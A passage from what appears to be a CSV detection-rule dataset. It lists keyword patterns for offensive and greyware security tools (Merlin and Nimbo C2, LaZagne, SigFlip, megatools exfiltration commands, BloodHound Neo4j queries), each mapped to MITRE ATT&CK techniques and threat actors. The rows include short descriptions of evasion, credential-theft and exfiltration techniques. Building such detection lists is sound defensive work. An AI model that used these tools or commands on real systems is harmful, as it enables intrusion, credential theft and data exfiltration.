a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*master/HookDetector*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*master/ImplantSSP/*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*master/SwampThing*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*master/UnquotedPath*,offensive_tool_keyword,UnquotedPath,Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into,T1543.003 - T1036.005 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*,greyware_tool_keyword,Neo4j,Neo4j queries - Computers in Unconstrained Delegations,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*,greyware_tool_keyword,Neo4j,Neo4j queries - Computers AllowedToDelegate to other computers,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*MATCH p=(u:User)-[:SQLAdmin]*(c:Computer) return p*,greyware_tool_keyword,Neo4j,Neo4j queries - Potential SQL Admins,T1210.002 - T1078.003 - T1046,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*matterpreter*,offensive_tool_keyword,Github Username,github username hosting offensive tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/matterpreter,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*matterpreter/DefenderCheck*,offensive_tool_keyword,DefenderCheck,Identifies 
the bytes that Microsoft Defender flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*matterpreter/Shhmon*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*MattKeeley/Spoofy*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*MayankPandey01/Jira-Lens*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*mbrg/power-pwn*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*mcafee_epo2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*McpManagementPotato.*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*md 
*.::$index_allocation*,greyware_tool_keyword,$index_allocation,creation of hidden folders (and file) via ...$.......::$index_allocation,T1027.001 - T1564.001,TA0005 ,N/A,N/A,Defense Evasion,https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*Md4-128.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Md5-128.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*mDNSSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*MDSDLL_x64.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MDSDLL_x86.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mdsecactivebreach*,offensive_tool_keyword,Github Username,MDSecs ActiveBreach Team. own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mdsecactivebreach/CACTUSTORCH*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*mdsecactivebreach/Farmer*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,1,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*med0x2e/GadgetToJScript*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*med0x2e/SigFlip*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*med0x2e/SigFlip*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*media_variable_file_cryptography.py*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*megacmd -conf * put *mega:*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - 
T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*megadose/holehe*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*megadose@protonmail.com*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*megatools copy -l * -r *,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*megatools put *,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*meliht/Mr.SIP*,offensive_tool_keyword,Mr.SIP,Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.,T1522 - T1521 - T1523 - T1505 - T1506,TA0010 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/meliht/Mr.SIP,1,1,N/A,N/A,4,366,100,2023-05-21T08:11:20Z,2017-09-07T18:23:00Z -*Memcrashed-DDoS-Exploit*,offensive_tool_keyword,Memcrashed-DDoS-Exploit,This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io,T1436 - T1498 - T1216 - T1190,TA0043 - TA0044 - TA0001,N/A,N/A,Exploitation tools,https://github.com/649/Memcrashed-DDoS-Exploit,1,1,N/A,N/A,10,1278,493,2022-12-02T07:14:59Z,2018-03-02T21:19:51Z -*memfd implant *.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*memfd task *.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z 
-*memory*mimipy.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*memory/onepassword.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*memorydump.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*memorydump.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*memreader *access_token*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*MemReader_BoF.*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,1,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*merlin-*.zip*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*Merlin_v0.1Beta.zip*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinAgent-*.7z*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent-*.exe*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinAgent-Darwin-*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent-Linux-*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinAgent-Windows-x64.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 
- T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*MerlinCheatSheet.pdf*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinServer-*.7z*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinServer-*.exe*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinserver.go*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinserver_windows_x64.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - 
